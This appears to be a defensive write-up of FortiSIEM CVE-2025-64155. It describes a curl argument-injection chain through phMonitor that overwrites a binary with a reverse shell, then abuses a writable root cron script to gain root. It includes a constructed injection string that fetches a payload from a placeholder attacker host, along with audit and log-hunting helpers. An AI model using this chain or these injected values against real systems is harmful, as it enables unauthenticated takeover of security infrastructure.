
In August 2025, Fortinet issued an advisory for CVE-2025-25256, an OS command injection vulnerability (CWE-78) in FortiSIEM that exposed the platform to unauthenticated remote code execution via crafted CLI requests.
Working exploits surfaced in the wild, prompting Horizon3.ai to dig into the affected code path. Their analysis uncovered a second, distinct chain: an unauthenticated argument injection that yields an arbitrary file write and remote code execution as the admin user, paired with a file-overwrite privilege escalation to root.
Fortinet tracks the chain as CVE-2025-64155 under advisory FG-IR-25-772. A proof-of-concept exploit is available on GitHub.
This is the latest chapter in Horizon3.ai's long-running work on FortiSIEM. Earlier disclosures from the same researchers include CVE-2023-34992 (phMonitor command injection) and CVE-2024-23108 (a second-order injection), each documented in its own deep dive.
Although none of these issues is listed in CISA's Known Exploited Vulnerabilities catalog, Black Basta ransomware chats leaked earlier in 2025 referenced the earlier FortiSIEM flaws, indicating threat actor interest in the product.
FortiSIEM Architecture and phMonitor Exposure
FortiSIEM supports several deployment shapes, from an all-in-one server to a supervisor plus collectors; in every case the phMonitor service carries inter-role communication over TCP port 7900.
phMonitor accepts its custom API messages without authentication and dispatches each one to a handler selected by an integer command identifier in phMonitorProcess::initEventHandler. Hardening after earlier disclosures shrank the exposed surface, but reachable bugs remain.
CVE-2025-64155 lives in handleStorageRequest when the requested storage type is "elastic". Attacker-controlled XML tags such as cluster_name and cluster_url are passed through to /opt/phoenix/phscripts/bin/elastic_test_url.sh.
The values are handed over via subprocess.run() and escaped with wrapShellToken, which neutralises shell metacharacters, but the script's eventual curl call (reached through execve) still receives the attacker's text as curl command-line arguments, so argument injection remains possible.
curl's little-known --next flag starts a second, independent request within the same invocation. An attacker can therefore append a second URL together with an output option and have the one curl run fetch attacker-supplied content and write it to a path of their choosing.
The file write is used to overwrite phLicenseTool, a binary the platform executes every few seconds, with a reverse shell, yielding a shell as the admin user.
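To make the mechanism concrete, the following is an added illustration of the vulnerability class, not FortiSIEM's elastic_test_url.sh (which this page does not reproduce) and not Horizon3.ai's exploit. It assumes the wrapper script expands the caller-controlled URL unquoted, and it replaces curl with a stand-in that only prints the argv it receives, so the block runs offline. The injected value and host names are constructed for the demo.

```shell
#!/bin/sh
# Added illustration of curl argument injection through an unquoted shell expansion.
# Not FortiSIEM code: the real script and its escaping are not reproduced here.

# Stand-in for curl: prints each argument on its own line so the final argv is visible.
fake_curl() {
  for arg in "$@"; do printf '%s\n' "$arg"; done
}

# Vulnerable shape (assumption: the value is expanded unquoted). Word splitting turns one
# string into many arguments, so "--next" and "-o" reach curl as options, not as URL text.
# No shell metacharacters are needed, which is why metacharacter escaping does not help.
probe_unsafe() {
  # shellcheck disable=SC2086  (the missing quotes are the bug being demonstrated)
  fake_curl -s -k -m 5 $1
}

# Hardened shape: accept only an http(s) URL containing no whitespace, and pass it as a
# single quoted argument after --url so curl can never parse it as an option.
probe_safe() {
  url=$1
  case "$url" in
    http://*|https://*) ;;
    *) printf 'rejected: scheme must be http or https\n' >&2; return 1 ;;
  esac
  case "$url" in
    *[[:space:]]*) printf 'rejected: whitespace in URL\n' >&2; return 1 ;;
  esac
  fake_curl -s -k -m 5 --url "$url"
}

# Constructed attacker value: a plausible cluster URL followed by a second request whose
# response curl would write to an arbitrary path (the shape the text describes).
INJECTED='http://es.internal:9200 --next http://attacker.example/payload -o /tmp/overwritten'

# Number of argv elements the stand-in curl receives on each path.
count_args_unsafe() { probe_unsafe "$INJECTED" | wc -l | tr -d ' '; }
count_args_safe()   { probe_safe 'https://es.internal:9200/_cluster/health' | wc -l | tr -d ' '; }
```

Run `probe_unsafe "$INJECTED"` and the stand-in prints nine separate arguments, including `--next`, the attacker URL, `-o` and the output path; `probe_safe "$INJECTED"` refuses the value before any command runs. Validation of the URL shape is the control that matters; quoting alone would still let a single hostile argument such as `--next` reach curl if validation is skipped.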
| Version | Affected | Solution |
|---|---|---|
| 7.4 | Not affected | N/A |
| 7.3 | 7.3.0-7.3.1 | Upgrade to 7.3.2+ |
| 7.2 | 7.2.0-7.2.5 | Upgrade to 7.2.6+ |
| 7.1 | 7.1.0-7.1.7 | Upgrade to 7.1.8+ |
| 7.0 | 7.0.0-7.0.3 | Upgrade to 7.0.4+ |
| 6.7 | 6.7.0-6.7.9 | Upgrade to 6.7.10+ |
| 6.6 and below | All versions | Migrate to fixed release |
An admin shell leads to root through cron job abuse. The root crontab /etc/cron.d/fsm-crontab runs /opt/charting/redishb.sh every minute as root, yet the script is writable by the admin user. Replacing its contents with a payload therefore runs that payload as root within a minute, completing the compromise.
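The same weakness, a cron job whose target can be modified by a user other than the one it runs as, is easy to audit for in general. The helper below is an added example, not code from Fortinet or Horizon3.ai; it generalises the fsm-crontab/redishb.sh case to every job in a cron.d-style directory. It assumes GNU stat (Linux) and takes the directory to scan as a parameter so it can be pointed at a copy.

```shell
#!/bin/sh
# Added audit helper (not FortiSIEM code): report cron.d jobs whose command file could be
# modified by a user other than the one the job runs as. Requires GNU stat.

# Usage: audit_cron_targets /etc/cron.d
# Prints "WRITABLE <run-as user> <command path> (<cron file>)" per finding.
# Exit status 0 when nothing was flagged, 1 otherwise.
audit_cron_targets() {
  dir=$1
  findings=0
  for cronfile in "$dir"/*; do
    [ -f "$cronfile" ] || continue
    # /etc/cron.d line: minute hour day month weekday user command [args...]
    # "@reboot"-style entries use one schedule field instead of five.
    while read -r f1 f2 f3 f4 f5 f6 f7 _rest; do
      case "$f1" in ''|'#'*|*=*) continue ;; esac     # blank, comment or VAR=value line
      case "$f1" in
        @*) user=$f2; cmd=$f3 ;;
        *)  user=$f6; cmd=$f7 ;;
      esac
      [ -f "$cmd" ] || continue                        # only absolute paths to real files
      owner=$(stat -c '%U' "$cmd")
      mode=$(stat -c '%a' "$cmd")
      # A file owned by someone else, or group/world writable (octal 022), can be
      # swapped for a payload that cron will then run as $user.
      if [ "$owner" != "$user" ] || [ $(( 0$mode & 022 )) -ne 0 ]; then
        printf 'WRITABLE %s %s (%s)\n' "$user" "$cmd" "$cronfile"
        findings=$((findings + 1))
      fi
    done < "$cronfile"
  done
  [ "$findings" -eq 0 ]
}
```

On an unpatched FortiSIEM host this reports /opt/charting/redishb.sh because it is owned by admin while fsm-crontab runs it as root. The check only covers the script file itself; a root-run script that sources or executes other user-writable files would need the same test applied to those paths.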
Indicators of Compromise
Monitor /opt/phoenix/log/phoenix.logs for PHL_ERROR entries that record elastic_test_url.sh invocations with unexpected arguments: injected curl options, attacker-controlled URLs, and output paths such as phLicenseTool.
Fortinet recommends upgrading to a fixed release and restricting network access to TCP port 7900 (phMonitor) to the hosts that need it. Organizations should audit their logs and patch immediately amid rising targeting of SIEM platforms.
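A first-pass hunt for those entries can be expressed as a token search that does not depend on the exact field layout of phoenix.logs. The helper below is an added example, not Fortinet or Horizon3.ai tooling; the sample log lines it ships with are constructed for the demo (including the IP address and the output paths), so confirm the tokens against real PHL_ERROR entries before relying on it.

```shell
#!/bin/sh
# Added hunting helper (not FortiSIEM code): flag elastic_test_url.sh log entries that carry
# curl option tokens or reference phLicenseTool. Only substrings are matched, so the real
# line format does not have to match the constructed sample below.

# Usage: hunt_elastic_test_abuse /opt/phoenix/log/phoenix.logs
# Prints matching lines; exit 0 if at least one matched, 1 if none.
hunt_elastic_test_abuse() {
  grep -a 'PHL_ERROR' "$1" \
    | grep -a 'elastic_test_url.sh' \
    | grep -a -E \
        -e '(^|[[:space:]])(--next|--output|-[oO])([[:space:]]|$)' \
        -e 'phLicenseTool'
}

# Constructed sample log for the demo. Timestamps, hosts, 198.51.100.7 and the output paths
# are placeholders; the second line is a benign failure that must not be flagged.
write_sample_log() {
  cat > "$1" <<'EOF'
2025-12-01T10:14:02 [PHL_INFO] phMonitor: storage test type=elastic url=http://es.internal:9200
2025-12-01T10:14:03 [PHL_ERROR] phMonitor: elastic_test_url.sh failed for http://es.internal:9200/_cluster/health (connection refused)
2025-12-01T10:15:41 [PHL_ERROR] phMonitor: elastic_test_url.sh failed for http://es.internal:9200 --next http://198.51.100.7/p -o /opt/phoenix/phLicenseTool
2025-12-01T10:15:42 [PHL_ERROR] phMonitor: elastic_test_url.sh failed for http://es.internal:9200 --next http://198.51.100.7/s --output /tmp/x
EOF
}
```

Against the sample, the two lines carrying `--next` are reported and the plain connection failure is not. The option pattern requires the token to stand alone, so a hostname such as es-o.internal does not trigger a hit; a hit on phLicenseTool alone is worth treating as high severity because a benign storage test has no reason to mention that binary.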
